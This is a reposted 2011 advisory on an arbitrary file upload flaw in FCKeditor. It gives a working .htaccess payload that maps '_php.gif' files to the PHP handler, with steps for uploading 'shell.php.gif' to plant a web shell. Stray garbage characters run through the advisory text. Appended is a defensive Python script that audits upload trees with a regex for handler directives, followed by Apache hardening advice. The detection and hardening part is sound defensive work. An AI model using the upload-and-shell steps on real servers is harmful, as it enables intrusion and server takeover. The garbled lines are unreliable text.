FCKeditor Upload vulnerability affecting all PHP versions
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
: N- k) F/ f) J c: l/ H+ o' x3 \' M1 h) x4 Z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability/ }# y6 A. l1 x( w
[+] Date: 2011
3 [2 T" S+ t X7 B% X) o9 f6 s$ l[+] Author : sinesafe.cn5 I" ~4 l$ ]- u {7 f* z
[+] Website : WwW.sinesafe.cn0 o* C0 s) F, K- h: Y. _
———————————————————0 ]7 p) u) M+ q) U6 n" ]; x
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
! A# e5 V; I" I, D3.Now upload shell.php.gif with FCKeditor.1 I! O" Q' p- x5 _! V" [" L
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
3 {: E# _, w- G1 J8 x" ~5.http://www.sinesafe.cn/anything/shell_php.gif- I+ Q% z& p' V$ z) ~. r" P# V3 R
6.Now shell is available from server. |
/ y- x9 J3 Y& a0 v9 z. ~
* z) L& \/ ~$ ], u3 J K2 [4 i! c- I2 p I* p7 q3 d
|
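The whole technique above depends on two things: the web server honouring a user-supplied .htaccess inside the upload directory, and that .htaccess being allowed to re-map a harmless-looking extension to the PHP handler. An administrator can audit for exactly that condition. The following Python script is an added defensive example, not code from the advisory or from sinesafe.cn; it walks an upload tree, flags any .htaccess that carries a handler- or PHP-affecting directive, and builds a constructed sample tree (hypothetical paths, not the site's real layout) so it can be run offline.

```python
import os
import re
import tempfile

# Directives that let a per-directory .htaccess change how a file is executed.
# Any of these inside a user-writable upload tree is a red flag, because it is
# how a renamed "shell_php.gif" gets handed to the PHP interpreter.
HANDLER_DIRECTIVES = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|ForceType|"
    r"php_value|php_flag|php_admin_value|php_admin_flag)\b",
    re.IGNORECASE,
)


def htaccess_findings(text):
    """Return the handler-affecting directive lines found in one .htaccess body."""
    return [line.strip() for line in text.splitlines() if HANDLER_DIRECTIVES.match(line)]


def audit_upload_tree(root):
    """Walk an upload directory and report every .htaccess that overrides handlers.

    Returns a list of (path, [offending lines]); an empty list means nothing
    in the tree can re-map extensions to PHP via .htaccess.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower() != ".htaccess":
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                lines = htaccess_findings(fh.read())
            if lines:
                findings.append((path, lines))
    return findings


def build_sample_tree():
    """Create a constructed sample upload tree (assumed layout, not from the page).

    It holds one harmless .htaccess and one that mirrors the handler override
    the advisory describes, so the audit has something to find.
    """
    root = tempfile.mkdtemp(prefix="upload_audit_")
    safe_dir = os.path.join(root, "images")
    bad_dir = os.path.join(root, "files")
    os.makedirs(safe_dir)
    os.makedirs(bad_dir)
    with open(os.path.join(safe_dir, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write("Options -Indexes\n")  # benign: only disables directory listing
    with open(os.path.join(bad_dir, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write('<FilesMatch "_php.gif">\n'
                 "SetHandler application/x-httpd-php\n"
                 "</FilesMatch>\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for path, lines in audit_upload_tree(sample_root):
        print(f"[!] {path}")
        for line in lines:
            print(f"      {line}")
```

The audit is a detection aid; the fix is to stop the server from reading .htaccess in upload paths at all. In the main Apache configuration, a `<Directory>` block for the upload tree with `AllowOverride None` ignores any uploaded .htaccess, and `php_admin_flag engine off` (mod_php) in that same block keeps PHP from executing there even if a handler mapping slips through.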